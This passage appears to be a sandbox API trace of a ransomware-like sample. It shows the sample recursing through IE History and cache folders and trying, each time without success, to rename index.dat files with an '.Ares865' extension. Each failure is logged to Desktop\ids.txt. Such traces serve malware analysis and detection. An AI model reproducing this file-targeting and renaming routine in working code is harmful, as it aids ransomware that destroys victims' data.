Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 208 [0112.089] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.089] GetLastError () returned 0x20 [0112.089] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 230 [0112.089] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 230 [0112.089] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.089] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x83b6 [0112.089] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xe6, lpOverlapped=0x0) returned 1 [0112.090] CloseHandle (hObject=0x118) returned 1 [0112.090] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.090] CloseHandle (hObject=0x0) returned 0 [0112.090] CloseHandle (hObject=0x0) returned 0 [0112.090] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0112.090] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0112.090] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0112.105] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 217 [0112.105] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.106] GetLastError () returned 0x20 [0112.106] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 239 [0112.106] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 239 [0112.106] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.106] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x849c [0112.106] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xef, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xef, lpOverlapped=0x0) returned 1 [0112.107] CloseHandle (hObject=0x118) returned 1 [0112.107] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.107] CloseHandle (hObject=0x0) returned 0 [0112.107] CloseHandle (hObject=0x0) returned 0 [0112.107] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0112.128] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 200 [0112.129] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.129] GetLastError () returned 0x20 [0112.129] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 222 [0112.129] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 222 [0112.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.129] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x858b [0112.129] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xde, lpOverlapped=0x0) returned 1 [0112.130] CloseHandle (hObject=0x118) returned 1 [0112.130] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.130] CloseHandle (hObject=0x0) returned 0 [0112.130] CloseHandle (hObject=0x0) returned 0 [0112.130] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0112.131] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 225 [0112.131] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.131] GetLastError () returned 0x20 [0112.131] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 247 [0112.131] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 247 [0112.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.132] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8669 [0112.132] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xf7, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xf7, lpOverlapped=0x0) returned 1 [0112.132] CloseHandle (hObject=0x118) returned 1 [0112.132] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.132] CloseHandle (hObject=0x0) returned 0 [0112.132] CloseHandle (hObject=0x0) returned 0 [0112.132] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0112.132] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0112.133] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0112.149] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 234 [0112.149] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.149] GetLastError () returned 0x20 [0112.149] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 256 [0112.150] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 256 [0112.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.150] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8760 [0112.150] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x100, lpOverlapped=0x0) returned 1 [0112.151] CloseHandle (hObject=0x118) returned 1 [0112.151] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.151] CloseHandle (hObject=0x0) returned 0 [0112.151] CloseHandle (hObject=0x0) returned 0 [0112.151] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0112.188] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 217 [0112.188] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.188] GetLastError () returned 0x20 [0112.188] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 239 [0112.188] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 239 [0112.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.189] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8860 [0112.189] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xef, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xef, lpOverlapped=0x0) returned 1 [0112.190] CloseHandle (hObject=0x118) returned 1 [0112.190] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.190] CloseHandle (hObject=0x0) returned 0 [0112.190] CloseHandle (hObject=0x0) returned 0 [0112.190] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0112.191] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 242 [0112.191] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.191] GetLastError () returned 0x20 [0112.191] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 264 [0112.191] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 264 [0112.191] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.192] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x894f [0112.192] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x108, lpOverlapped=0x0) returned 1 [0112.192] CloseHandle (hObject=0x118) returned 1 [0112.192] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.192] CloseHandle (hObject=0x0) returned 0 [0112.193] CloseHandle (hObject=0x0) returned 0 [0112.193] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0112.193] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0112.193] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0112.215] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 234 [0112.215] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0112.215] GetLastError () returned 0x20 [0112.215] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 256 [0112.215] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 256 [0112.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.216] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a57 [0112.216] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x100, lpOverlapped=0x0) returned 1 [0112.216] CloseHandle (hObject=0x118) returned 1 [0112.216] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.216] CloseHandle (hObject=0x0) returned 0 [0112.216] CloseHandle (hObject=0x0) returned 0 [0112.216] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0112.217] wsprintfW 